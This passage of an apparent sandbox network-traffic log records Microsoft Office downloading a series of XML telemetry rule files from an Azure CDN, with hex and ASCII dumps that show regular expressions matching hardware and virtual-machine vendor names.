T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:09 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:09 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:09 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: dcb3d461-101e-000b-6d69-355e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131009Z-1866b5c5fbbqjkpbhC1DFWt4h400000001eg00000000bxpe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:09 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:10 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:10 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:10 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: cf25fe23-201e-0000-80af-36a537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131010Z-16547b76f7ftdm8dhC1DFWs13g0000000n4g000000009h8s x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:10 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:10 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:10 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:10 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 818d7a8e-001e-005a-6101-36c3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131010Z-1866b5c5fbb8pmbjhC1DFW6z0c00000001e0000000003m06 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-15 13:10:10 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49830	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:10 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:10 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:10 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: da73b1ea-a01e-0070-5573-35573b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131010Z-16547b76f7fgvq8chC1DFWhd2w00000001yg000000005upn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:10 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49829	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:10 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:10 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:10 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131010Z-16547b76f7f7rtshhC1DFWrtqn0000000n2g00000000g72z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:10 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49831	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:10 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:10 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:10 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 6b1971c7-b01e-0053-1140-36cdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131010Z-16547b76f7f7scqbhC1DFW0m5w0000000mxg00000000fzbs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:10 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49832	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:11 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:11 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:11 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131011Z-16547b76f7fgvq8chC1DFWhd2w00000001wg000000009v7a x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:11 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49833	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:11 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:11 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:11 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 4f504748-101e-0079-0faf-365913000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131011Z-16547b76f7fbkfmzhC1DFWm9tw00000000xg00000000b88e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:11 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49834	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:11 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:11 UTC	491	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:11 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 50ec53c4-601e-0070-35a1-34a0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131011Z-164f84587bf6n6jwhC1DFW90fn00000000eg000000003rv7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-15 13:10:11 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49835	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:11 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:11 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:11 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 28ec3a41-801e-00a0-70af-362196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131011Z-1866b5c5fbb2t6txhC1DFWa2qc00000001bg000000003y5y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:11 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49836	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:11 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:11 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:11 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 43524bb3-601e-003e-69d2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131011Z-16547b76f7f7lhvnhC1DFWa2k00000000mzg00000000ekzu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:11 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49837	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:11 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:12 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:11 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: fa98855d-501e-0064-4540-361f54000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131011Z-16547b76f7fhvzzthC1DFW557000000001ag00000000ef8f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
